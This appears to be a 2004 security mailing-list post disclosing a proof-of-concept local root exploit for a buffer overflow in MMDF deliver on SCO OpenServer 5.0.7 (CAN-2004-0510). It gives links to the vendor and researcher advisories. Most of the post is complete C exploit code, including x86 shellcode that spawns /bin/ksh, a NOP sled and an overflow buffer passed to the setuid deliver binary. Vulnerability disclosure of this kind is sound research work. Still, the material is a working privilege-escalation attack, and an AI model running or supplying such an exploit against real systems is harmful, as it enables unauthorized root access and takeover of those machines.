MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
Hi,
I have written a proof of concept code for one of the various buffer overflows
reported by Deprotect and SCO in:
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt
http://www.deprotect.com/advisories/DEPROTECT-20040206.txt
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
MMDF buffer overflows the name CAN-2004-0510.
/*
* MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
* Copyright 2004 Ramon de Carvalho Valle
*
*/
char shellcode[]= /* 36 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""/ksh" /* pushl $0x68736b2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;
main(int argc,char **argv) {
char buffer[16384],address[4],*p;
int i;
printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
printf("Copyright 2004 Ramon de Carvalho Valle\n\n");
*((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;
sprintf(buffer,"-c");
p=buffer+2;
for(i=0;i<5120;i++) *p++=address[i%4];
for(i=0;i<8192;i++) *p++=0x90;
for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
*p=0;
execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}
Best regards,
Ramon de Carvalho Valle